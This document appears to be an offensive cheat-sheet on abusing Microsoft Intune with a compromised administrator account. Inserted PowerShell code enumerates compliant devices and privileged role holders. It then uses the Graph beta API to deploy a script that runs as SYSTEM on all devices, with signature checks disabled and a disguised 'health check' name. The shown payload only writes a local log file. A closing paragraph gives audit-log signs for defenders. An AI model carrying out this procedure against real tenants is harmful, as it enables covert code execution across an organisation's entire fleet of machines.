Abusing Intune

The Intune admin center is publicly reachable from the internet at https://endpoint.microsoft.com/#home (it now redirects to intune.microsoft.com), so a compromised admin account can push scripts to every managed device from anywhere, without any foothold inside the network.

Enumeration

  • the target device should show isCompliant = True in PowerShell (Get-AzureADDevice / Get-MgDevice) / Compliant = Yes in the Azure portal, i.e. it is an enrolled Windows device that is checking in with Intune
  • Global Administrator / Intune Administrator
    • can create and assign PowerShell (platform) scripts to devices
    • the scripts run as NT AUTHORITY\SYSTEM on the managed device unless "run using the logged on credentials" is selected
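The two preconditions above can be checked from PowerShell with the Microsoft Graph SDK. This is an added example, not code from the original page; it assumes the Microsoft.Graph modules are installed and that the signed-in account can read devices and directory roles (Directory.Read.All is assumed to be sufficient).

```powershell
# Added example: enumerate compliant Windows devices and the holders of the two
# roles that can push platform scripts. Assumes the Microsoft.Graph modules are
# installed and Directory.Read.All is enough for the signed-in account.
Import-Module Microsoft.Graph.Authentication
Import-Module Microsoft.Graph.Identity.DirectoryManagement

Connect-MgGraph -Scopes 'Directory.Read.All'

# 1. Which Windows devices are Intune-compliant (IsCompliant = True)?
#    Compliant devices are enrolled and checking in, so a script will reach them.
$compliant = Get-MgDevice -All |
    Where-Object { $_.IsCompliant -eq $true -and $_.OperatingSystem -like 'Windows*' }
$compliant |
    Select-Object DisplayName, OperatingSystemVersion, IsManaged, IsCompliant, ApproximateLastSignInDateTime |
    Format-Table -AutoSize

# 2. Who holds Global Administrator / Intune Administrator?
#    Get-MgDirectoryRole only lists roles that have been activated in the tenant,
#    and only permanent assignments; PIM-eligible members do not appear here.
foreach ($roleName in 'Global Administrator', 'Intune Administrator') {
    $role = Get-MgDirectoryRole -Filter "displayName eq '$roleName'"
    if (-not $role) {
        Write-Warning "$roleName has no active assignments in this tenant"
        continue
    }
    Get-MgDirectoryRoleMember -DirectoryRoleId $role.Id | ForEach-Object {
        $props = $_.AdditionalProperties
        $name = if ($props['userPrincipalName']) { $props['userPrincipalName'] } else { $props['displayName'] }
        [pscustomobject]@{
            Role   = $roleName
            Member = $name            # user UPN, or group / service principal display name
            Type   = $props['@odata.type']
        }
    }
}
```

Members that come back as groups or service principals are worth expanding separately: a group nested into Intune Administrator means every member of that group can run the abuse below.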

Abuse

Devices > All devices > Windows > Scripts and remediations > Platform scripts > Add a script, then:

  • Run this script using the logged on credentials: No (so it runs as SYSTEM)
  • Enforce script signature check: No
  • Run script in 64 bit PowerShell Host: Yes
  • Assignments: Add all users, Add all devices
  • let it run
    • can take up to one hour to execute: the Intune Management Extension on each device checks in roughly hourly and after a reboot, and only then fetches and runs new scripts, so results trickle in over the following hour
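The same deployment can be driven through the Microsoft Graph beta API, which is what the portal calls under the hood. This is an added example, not code from the original page; it assumes Microsoft.Graph.Authentication is installed, that the signed-in account holds Global Administrator or Intune Administrator, and that the beta deviceManagementScripts resource, its assign action and its deviceRunStates navigation keep the property names used here (taken from the beta API, treated as an assumption). The embedded payload and the displayName/fileName are made up for the example.

```powershell
# Added example: create, assign and monitor an Intune platform script via Graph beta.
# Assumes Microsoft.Graph.Authentication and an admin account that can write
# device-management configuration; beta property names are an assumption.
Import-Module Microsoft.Graph.Authentication
Connect-MgGraph -Scopes 'DeviceManagementConfiguration.ReadWrite.All'

# Payload executed by the Intune Management Extension. With runAsAccount = system it
# runs as NT AUTHORITY\SYSTEM; this one only proves that and logs it locally (constructed
# for the example; the operator substitutes their own actions).
$payload = @'
$log = Join-Path $env:ProgramData 'intune-poc.log'
$who = [Security.Principal.WindowsIdentity]::GetCurrent().Name
"$(Get-Date -Format o) host=$env:COMPUTERNAME user=$who is64bit=$([Environment]::Is64BitProcess)" |
    Out-File -FilePath $log -Append -Encoding utf8
'@

# The three portal settings from the procedure above, as API fields
$script = @{
    '@odata.type'         = '#microsoft.graph.deviceManagementScript'
    displayName           = 'Windows health check'   # innocuous name (assumption)
    fileName              = 'healthcheck.ps1'
    scriptContent         = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($payload))
    runAsAccount          = 'system'   # "Run this script using the logged on credentials: No"
    enforceSignatureCheck = $false     # "Enforce script signature check: No"
    runAs32Bit            = $false     # "Run script in 64 bit PowerShell Host: Yes"
}

$created = Invoke-MgGraphRequest -Method POST `
    -Uri 'https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts' `
    -Body ($script | ConvertTo-Json -Depth 5) -ContentType 'application/json'
$scriptId = $created.id

# "Add all users, add all devices"
$assign = @{
    deviceManagementScriptAssignments = @(
        @{ target = @{ '@odata.type' = '#microsoft.graph.allDevicesAssignmentTarget' } },
        @{ target = @{ '@odata.type' = '#microsoft.graph.allLicensedUsersAssignmentTarget' } }
    )
}
Invoke-MgGraphRequest -Method POST `
    -Uri "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/$scriptId/assign" `
    -Body ($assign | ConvertTo-Json -Depth 5) -ContentType 'application/json'

# Devices pick the script up at their next hourly check-in (or reboot), so poll
# the per-device run state over the following hour instead of expecting it now.
$states = Invoke-MgGraphRequest -Method GET `
    -Uri "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/$scriptId/deviceRunStates?`$expand=managedDevice"
$states.value | ForEach-Object {
    [pscustomobject]@{
        Device = $_.managedDevice.deviceName
        State  = $_.runState          # pending / success / fail
        Error  = $_.errorDescription
    }
} | Format-Table -AutoSize
```

From the defender's side, the objects created here are visible in the Intune audit log (Tenant administration > Audit logs) as "Create DeviceManagementScript" and "Assign" events, and the script body is stored base64-encoded in scriptContent, so an unexpected platform script assigned to all devices and running as system is the thing to alert on.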